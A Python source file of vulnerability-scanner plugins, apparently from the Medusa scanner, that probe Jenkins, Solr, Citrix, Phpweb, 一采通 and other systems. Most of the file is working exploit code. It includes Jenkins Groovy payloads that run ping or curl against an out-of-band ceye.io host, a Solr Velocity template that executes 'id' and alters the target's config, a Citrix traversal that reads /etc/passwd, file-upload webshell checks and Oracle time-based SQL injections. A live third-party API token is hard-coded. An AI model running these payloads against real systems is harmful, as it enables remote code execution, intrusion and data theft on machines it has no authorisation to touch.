            resp2 = requests.get(payload_url2, headers=headers, timeout=6, verify=False)
            # NOTE(review): hard-coded third-party API token committed in source —
            # treat it as leaked and load it from configuration instead.
            dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=dns&filter='
            time.sleep(5)  # fixed wait before polling the DNS-log API
            resp3 = requests.get(dnslog, timeout=5, verify=False)
            con2 = resp2.text
            con3 = resp3.text
            if con3.find(ran) != -1:
                Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\n回显内容:{}\r\nDNSlog:{}\r\n".format(url, con2, con3)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # pass the url and the scanned data
                ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
    except Exception:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
def medusa(Url, RandomAgent, Token, proxies=None):
    """Probe ``Url`` for an injection condition and for an exposed user page.

    Pass 1 iterates the module-level ``urls`` list, appending the module-level
    ``payload`` to each, and treats an HTTP 500 whose body contains
    ``gqxmicrosoft`` as positive. Pass 2 requests ``/include/get_user.aspx`` and
    treats a body containing ``button_normal`` as positive. Every positive
    result is recorded; the loop does not stop at the first hit.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        Token: forwarded to ``VulnerabilityDetails(...)``.
        proxies: proxy setting, normalised through ``ClassCongregation.Proxies``.

    Returns:
        None. Findings are written through ``WriteFile`` and ``VulnerabilityDetails``.

    Notes:
        ``urls`` and ``payload`` are not defined in this block; they must exist at
        module level. Pass 1 omits the port from the URL while pass 2 includes it.
        All requests use ``verify=False``.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    for turl in urls:
        try:
            payload_url = scheme + "://" + url + turl + payload
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 500 and con.lower().find('gqxmicrosoft') != -1:
                Medusa = "{}存在璐华OA系统SQL注入漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
                ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url, Token).Write()  # pass the url and the scanned data
        except:
            # Per-path error handling: one failing path does not abort the loop.
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + "/include/get_user.aspx"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
        con = resp.text
        if con.lower().find('button_normal') != -1:
            Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, payload_url)
            ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url, Token).Write()  # pass the url and the scanned data
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
def medusa(Url, RandomAgent, ProxyIp=None):
    """Probe a Jenkins instance for an unauthenticated script console at ``/script``.

    Fetches ``/script`` once to harvest a cookie string, posts a fixed
    form-encoded body to the same path, waits 5 s, polls a ceye.io HTTP-log API,
    and treats the presence of the 10-character random marker ``ran`` in the
    target's response body as positive.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: HTTP proxy address or ``None`` for a direct connection.

    Returns:
        ``str(VulnerabilityInfo(...).info)`` on a positive result, otherwise ``None``.

    Notes:
        The harvested cookie is printed to stdout. The DNS-log URL embeds a
        hard-coded API token. The initial cookie-fetching GET has no timeout and
        verifies TLS, unlike every other request here (``verify=False``).
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    global resp
    global resp2  # both globals leak the Response objects into module scope
    ran = ranstr(10)  # per-run marker searched for in the target's response
    # Percent-encoded form body; ``.format`` is applied to it with ``ran`` twice.
    post_data = '''script%3dprintln+%22ping+%7b%7d.mdtx4t.ceye.io%22.execute().text%26Jenkins-Crumb%3d32bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%26json%3d%7b%22script%22%3a+%22println+%5c%22ping+%7b%7d.mdtx4t.ceye.io%5c%22.execute().text%22%2c+%22%22%3a+%22%22%2c+%22Jenkins-Crumb%22%3a+%2232bfdadca3609e1e2f8e8414a0f363c16dd4115eb4e6af6305f2383a0ae40610%22%7d%26Submit%3d%e8%bf%90%e8%a1%8c'''.format(ran, ran)
    payload = "/script"
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        s = requests.session()
        # NOTE(review): this GET has no timeout, so a stalled target blocks the scan.
        cookises = re.compile('.*Cookie (.*) for.*').findall(str(s.get(payload_url).cookies))[0]  # regex-extract the Cookie string
        print(cookises)  # NOTE(review): session cookie written to stdout
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Cookis': cookises
        }
        if ProxyIp != None:
            proxies = {
                # the proxy address must carry an http:// or https:// scheme prefix
                "http": "http://" + str(ProxyIp)
            }
            resp = s.post(payload_url, headers=headers, data=post_data, timeout=6, proxies=proxies, verify=False)
        elif ProxyIp == None:
            resp = s.post(payload_url, headers=headers, data=post_data, timeout=6, verify=False)
        # NOTE(review): hard-coded third-party API token committed in source —
        # treat it as leaked and load it from configuration instead.
        dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=http&filter='
        time.sleep(5)  # fixed wait before polling the log API
        resp2 = requests.get(dnslog, timeout=5, verify=False)
        con = resp.text
        con2 = resp2.text  # included in the report but not part of the decision
        if con.find(ran) != -1:
            Medusa = "{}Jenkins配置不当导致未授权代码执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog{}\r\n".format(url, payload_url, con, con2)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            return (str(_t.info))
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
def medusa(Url, RandomAgent, ProxyIp):
    """Probe ``Url`` for a template/command-injection condition in ``/search.php``.

    Posts a fixed ``searchtype=5&searchword=...`` body to ``/search.php`` and
    treats an HTTP 200 whose body contains the strings ``System``, ``Compiler``,
    ``Build Date``, ``IPv6 Support`` and ``Configure Command`` (phpinfo markers)
    as positive.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: HTTP proxy address or ``None`` for a direct connection.

    Returns:
        ``str(VulnerabilityInfo(...).info)`` on a positive result, otherwise ``None``.

    Notes:
        The proxied branch uses ``timeout=6`` while the direct branch uses
        ``timeout=5``. The full response body is embedded, UTF-8 encoded, in the
        report string. The request uses ``verify=False``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    global resp
    global resp2  # declared but never assigned or read in this function
    try:
        payload = "/search.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        payload_data = "searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Origin': scheme + '://' + url,
            'Referer': payload  # path only, not an absolute URL
        }
        s = requests.session()
        if ProxyIp != None:
            proxies = {
                # the proxy address must carry an http:// or https:// scheme prefix
                "http": "http://" + str(ProxyIp)
            }
            resp = s.post(payload_url, headers=headers, data=payload_data, timeout=6, proxies=proxies, verify=False)
        elif ProxyIp == None:
            resp = s.post(payload_url, headers=headers, data=payload_data, timeout=5, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('System') != -1 and con.find('Compiler') != -1 and con.find('Build Date') != -1 and con.find('IPv6 Support') != -1 and con.find('Configure Command') != -1:
            # con.encode(...) yields bytes, so the report contains a b'...' repr of the body.
            Medusa = "{} 存在远程命令执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format(url, payload_url, con.encode(encoding='utf-8'))
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            return (str(_t.info))
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
def medusa(Url, RandomAgent, ProxyIp):
    """Probe a Jenkins instance via the ``SecureGroovyScript/checkScript`` endpoint.

    URL-encodes a small Groovy class containing a 10-character random marker,
    appends it to the ``checkScript?sandbox=true&value=`` query, sends the
    request, waits 5 s, polls a ceye.io DNS-log API, and treats the marker
    appearing in the target's own response body as positive.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        ProxyIp: HTTP proxy address or ``None`` for a direct connection.

    Returns:
        ``str(VulnerabilityInfo(...).info)`` on a positive result, otherwise ``None``.

    Notes:
        The proxied branch issues a GET while the direct branch issues a POST to
        the same URL. The DNS-log URL embeds a hard-coded API token. Requests use
        ``verify=False``.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    global resp
    global resp2  # both globals leak the Response objects into module scope
    try:
        ran = ranstr(10)  # per-run marker searched for in the target's response
        a = '''public class x { public x(){ "curl %s.mdtx4t.ceye.io".execute() } }''' % ran
        payload2 = urllib.parse.quote(a)  # url-encode
        payload1 = "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value="
        payload_url = scheme + "://" + url + ':' + str(port) + payload1 + payload2
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'en',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        if ProxyIp != None:
            proxies = {
                # the proxy address must carry an http:// or https:// scheme prefix
                "http": "http://" + str(ProxyIp)
            }
            resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False)
        elif ProxyIp == None:
            resp = requests.post(payload_url, headers=headers, timeout=6, verify=False)  # POST here, GET in the proxied branch
        # NOTE(review): hard-coded third-party API token committed in source —
        # treat it as leaked and load it from configuration instead.
        dnslog = 'http://api.ceye.io/v1/records?token=2e01a5af9e65acf90a94597fce586b49&type=dns&filter='
        time.sleep(5)  # fixed wait before polling the DNS-log API
        resp2 = requests.get(dnslog, timeout=5, verify=False)
        con = resp.text
        con2 = resp2.text  # included in the report but not part of the decision
        if con.find(ran) != -1:
            Medusa = "{}Jenkins远程命令执行漏洞\r\n漏洞详情:\r\nPayload:{}\r\n返回数据包:{}\r\nDNSlog{}\r\n".format(url, payload_url, con, con2)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            return (str(_t.info))
    except:
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # write the URL and plugin name to the error log
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """Probe a Solr instance for the VelocityResponseWriter template-injection condition.

    Lists cores via ``/solr/admin/cores``, posts a config update that enables the
    ``velocity`` response writer on the last core listed, then issues a ``select``
    query whose template runs ``id`` and treats an HTTP 200 body containing
    ``uid=``, ``groups=`` and ``gid=`` as positive.

    Args:
        Url: target URL as accepted by ``UrlProcessing``.
        RandomAgent: value sent as the ``User-Agent`` header.
        proxies: proxy setting, normalised through ``ClassCongregation.Proxies``.
        **kwargs: forwarded to ``VulnerabilityDetails(...)``.

    Returns:
        None. Findings are written through ``VulnerabilityDetails`` and ``WriteFile``.

    Notes:
        The config-update POST changes the target's Solr configuration and is not
        reverted. Requests to the target use ``verify=False`` except the first
        GET, which verifies TLS.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port from the URL is kept (no-op assignment)
    try:
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        payload_url = scheme + "://" + url + ":" + str(port) + '/solr/admin/cores'
        step1 = requests.get(payload_url, timeout=6, proxies=proxies, headers=headers).text
        data = json.loads(step1)
        if 'status' in data:
            name = ''
            for x in data['status']:
                name = x  # ends up holding the last core name listed
            payload = "/solr/" + name + "/config"
            payload2 = '/solr/' + name + '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
            payload_url1 = scheme + "://" + url + ":" + str(port) + payload
            payload_url2 = scheme + "://" + url + ":" + str(port) + payload2
            payload_data = """{ "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }"""
            headers1 = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/json',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
                'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
                'Accept-Encoding': 'gzip, deflate',
            }
            resp = requests.post(payload_url1, data=payload_data, headers=headers1, proxies=proxies, timeout=6, verify=False)  # response not inspected
            resp2 = requests.get(payload_url2, headers=headers, timeout=6, proxies=proxies, verify=False)
            con2 = resp2.text
            cod2 = resp2.status_code
            if con2.find("uid=") != -1 and con2.find("groups=") != -1 and con2.find("gid=") != -1 and cod2 == 200:
                # con2 (the command output echoed by the target) is embedded verbatim in the report.
                Medusa = "{} SolrVelocity模板远程代码执行漏洞\r\n验证数据:\r\nPayload:\r\n{}回显内容:{}\r\n\r\n".format(url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url, **kwargs).Write()  # pass the url and the scanned data
                ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)  # write to the error log
def medusa(**kwargs) -> None:
    """Scanner plugin: Phpweb unauthenticated file-upload check for one target.

    Reads "Url", "Headers" and "Proxies" from kwargs, requests an app code
    from /base/post.php, derives an MD5 token from it, POSTs a multipart
    body to /base/appfile.php and finally GETs the expected upload path.
    A 200 response whose body contains the random marker ``ran`` is
    treated as a positive and written out via VulnerabilityDetails and
    WriteFile.  Every exception is caught and routed to ErrorHandling /
    ErrorLog.  Returns None.

    Keyword Args:
        Url: target base URL (used as-is; no scheme/port normalisation here).
        Headers: request header dict — mutated in place, see note below.
        Proxies: passed straight through to requests.
    """
    url = kwargs.get("Url")  # target url passed in by the caller
    Headers = kwargs.get("Headers")  # header dict passed in by the caller
    proxies = kwargs.get("Proxies")  # proxy setting passed in by the caller
    try:
        payload1 = "/base/post.php"
        payload_url1 = url + payload1
        dada = "act=appcode"
        payload2 = "/base/appfile.php"
        payload_url2 = url + payload2
        ran = ClassCongregation.randoms().result(10)  # random marker also used as the file name
        payload_url3 = url + "/effect/source/bg/{}.txt".format(ran)
        # NOTE(review): Headers1 and Headers2 are the SAME dict object as the
        # caller's kwargs["Headers"]; the assignments below mutate that shared
        # dict (the later 'Content-Type' wins for every request using it) and
        # the change is visible to the caller after this function returns.
        Headers1 = Headers
        Headers2 = Headers
        Headers1['Accept'] = '*/*'
        Headers1['Content-Type'] = 'application/x-www-form-urlencoded'
        Headers2['Accept'] = '*/*'
        Headers2['Content-Type'] = 'multipart/form-data; boundary=----WebKitFormBoundary0ZoOKoVwkSlGFfVE'
        # verify=False on all three requests: TLS certificate validation is off.
        resp = requests.post(payload_url1, data=dada, proxies=proxies, headers=Headers1, timeout=5, verify=False)
        con = resp.text
        # Extract the value of k; re.match() returns None when the body does not
        # start with "k=", and .group(1) then raises AttributeError (caught below).
        k = re.match('k=(.*?)&', con, re.M | re.I).group(1)
        md5_en = hashlib.md5((k + "1").encode("utf-8")).hexdigest()
        # Multipart body; the three placeholders are (file name, file content, m).
        dada2 = '''------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="file"; filename="{}.txt" Content-Type: application/octet-stream {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="t" 1 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="m" {} ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="act" upload ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="r_size" 10 ------WebKitFormBoundary0ZoOKoVwkSlGFfVE Content-Disposition: form-data; name="submit" getshell ------WebKitFormBoundary0ZoOKoVwkSlGFfVE--'''.format(ran, ran, md5_en)
        resp2 = requests.post(payload_url2, data=dada2, proxies=proxies, headers=Headers2, timeout=5, verify=False)  # response is not inspected
        resp3 = requests.get(payload_url3, headers=Headers1, proxies=proxies, timeout=5, verify=False)
        code3 = resp3.status_code
        con3 = resp3.text
        # Positive when the fetched file exists (200) and echoes the random marker.
        if code3 == 200 and con3.find(ran) != -1:
            Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(url, payload_url2, dada2, payload_url3, con3)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, resp3, **kwargs).Write()  # record the url and the scan data
            ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        # NOTE(review): `_` is None if 'algroup' is absent, and `url` is None if
        # kwargs lacked "Url"; either makes the concatenation raise TypeError.
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e)  # log through the writer class
def medusa(Url, RandomAgent, UnixTimestamp):
    """Scanner plugin: 一采通 e-procurement editor file-upload check.

    POSTs a fixed multipart body to the editor's img_save.asp, parses the
    returned ``getimg('<digits>.cer')`` reference, then fetches that file
    from NewImage/ and reports a positive when it returns 200 and contains
    the marker "testvul".  Positives go through VulnerabilityDetails and
    WriteFile; any exception is swallowed after writing to ErrorLog.
    Returns None.

    Args:
        Url: target URL; UrlProcessing() splits it into scheme, host, port.
        RandomAgent: value sent as the User-Agent header.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, url, port = UrlProcessing(Url)
    # Derive the port from the scheme when the URL did not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        payload = "/library/editornew/Editor/img_save.asp"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert testvul ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- '''
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        # One session for both requests, so cookies set by the first are reused.
        s = requests.session()
        resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False)  # verify=False: TLS validation off
        con = resp.text
        # Look for the server-assigned file name echoed back as getimg('NNN.cer').
        match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con)
        if match:
            payload_url2 = scheme + "://" + url + ":" + str(port) + "/library/editornew/Editor/NewImage/" + match.group(1)
            resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False)
            con2 = resp2.text
            code2 = resp2.status_code
            # "testvul" is the marker string embedded in the uploaded body above;
            # the check passes only when the stored file echoes it back with 200.
            if code2 == 200 and con2.lower().find("testvul") != -1:
                Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format(url, payload_url2, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record the url and the scan data
                ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
    except Exception:
        # Errors are logged with the plugin name only; the exception itself is dropped.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # writer class: URL plus the name of the failing plugin
def medusa(Url, RandomAgent, UnixTimestamp):
    """Scanner plugin: Citrix Gateway path-traversal / template RCE check.

    POSTs to ``/vpn/../vpns/portal/scripts/newbm.pl`` with a random title,
    and, if the response is 200 and contains "parent.window.ns_reload",
    GETs ``/vpn/../vpns/portal/<random>.xml``.  A 200 body containing
    "root:", "bin:" and "/root" is reported as a positive through
    VulnerabilityDetails and WriteFile.  Any exception is written to
    ErrorLog and otherwise ignored.  Returns None.

    Args:
        Url: target URL; UrlProcessing() splits it into scheme, host, port.
        RandomAgent: value sent as the User-Agent header.
        UnixTimestamp: passed through to VulnerabilityDetails.
    """
    scheme, url, port = UrlProcessing(Url)
    # Derive the port from the scheme when the URL did not carry one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    payload = "/vpn/../vpns/portal/scripts/newbm.pl"
    payload_url = scheme + "://" + url + ":" + str(port) + payload
    randoms = rand()  # random token; rand() is defined elsewhere in this module
    try:
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            "Connection": "close",
            # NOTE(review): this literal has no "{}" placeholder, so
            # .format(randoms) is a no-op; the value may be redacted in this copy.
            "NSC_USER": "******".format(randoms),
            "NSC_NONCE": "nsroot"
        }
        data = "url=http://example.com&title={}&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]".format(randoms)
        # allow_redirects=False: a redirect is treated as a non-200 and ends the check.
        resp = requests.post(payload_url, data=data, headers=headers, timeout=5, verify=False, allow_redirects=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find("parent.window.ns_reload") != -1:
            payload_url2 = scheme + "://" + url + ":" + str(port) + '/vpn/../vpns/portal/{}.xml'.format(randoms)
            headers2 = {
                "NSC_USER": "******",
                "NSC_NONCE": "nsroot",
                "Upgrade-Insecure-Requests": "1",
                "Cache-Control": "max-age=0",
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'Accept-Language': 'en',
                'User-Agent': RandomAgent,
            }
            resp2 = requests.get(payload_url2, headers=headers2, timeout=5, verify=False)  # verify=False: TLS validation off
            con2 = resp2.text
            code2 = resp2.status_code
            # Positive only when all three passwd-style markers appear with HTTP 200.
            if code2 == 200 and con2.find("root:") != -1 and con2.find("bin:") != -1 and con2.find("/root") != -1:
                Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format(url, payload_url2, data, con2)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails(_t.info, url, UnixTimestamp).Write()  # record the url and the scan data
                ClassCongregation.WriteFile().result(str(url), str(Medusa))  # write to file; url is the target file name, Medusa the result
    except Exception:
        # Errors are logged with the plugin name only; the exception itself is dropped.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # writer class: URL plus the name of the failing plugin


# if __name__ == '__main__':
#
#     with open(r'../123.txt', 'r') as file:
#         content_lists = file.readlines()
#     url = [x.strip() for x in content_lists]
#     for l in url:
#         medusa(l)
#medusa("http://","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port urls = [ '/Plan/TitleShow/ApplyInfo.aspx?ApplyID=1', '/Price/AVL/AVLPriceTrends_SQU.aspx?classId=1', '/Price/SuggestList.aspx?priceid=1', '/PriceDetail/PriceComposition_Formula.aspx?indexNum=3&elementId=1', '/Products/Category/CategoryOption.aspx?option=IsStop&classId=1', '/Products/Tiens/CategoryStockView.aspx?id=1', '/custom/CompanyCGList.aspx?ComId=1', '/SuperMarket/InterestInfoDetail.aspx?ItemId=1', '/Orders/k3orderdetail.aspx?FINTERID=1', '/custom/GroupNewsList.aspx?child=true&groupId=121' ] payload1 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,0)" payload2 = "%20AND%206371=DBMS_PIPE.RECEIVE_MESSAGE(11,5)" for payload in urls: try: payload_url = scheme + "://" + url + ":" + str( port) + payload + payload1 payload_url2 = scheme + "://" + url + ":" + str( port) + payload + payload2 headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() time0 = time.time() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) time1 = time.time() resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False) time2 = time.time() con = resp.text code = resp.status_code code2 = resp2.status_code if code2 != 0 and code != 0 and ((time1 - time0) - (time2 - time1)) > 4: Medusa = "{}存在一采通电子采购系统SQL注入漏洞\r\n 验证数据:\r\n返回内容:{}\r\npayload:{}\r\n".format( url, con, payload_url) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,ProxyIp):
    """Scanner plugin: exposed archive / backup-file download check.

    Builds candidate file names from the target host name (joined with
    ":", "", ".", "_" and "-"), appends them to the module-level
    ``payloads`` list, then probes every ``payloads`` × ``suffixs``
    combination and every entry of ``SpecialPayload`` (all three names
    come from module scope, not from this function).  A 200 with an
    archive Content-Type is collected into ``Medusas``; the first
    ``SpecialPayload`` hit with Content-Type text/plain is marked High
    and returned immediately.

    Args:
        Url: target URL; UrlProcessing() splits it into scheme, host, port.
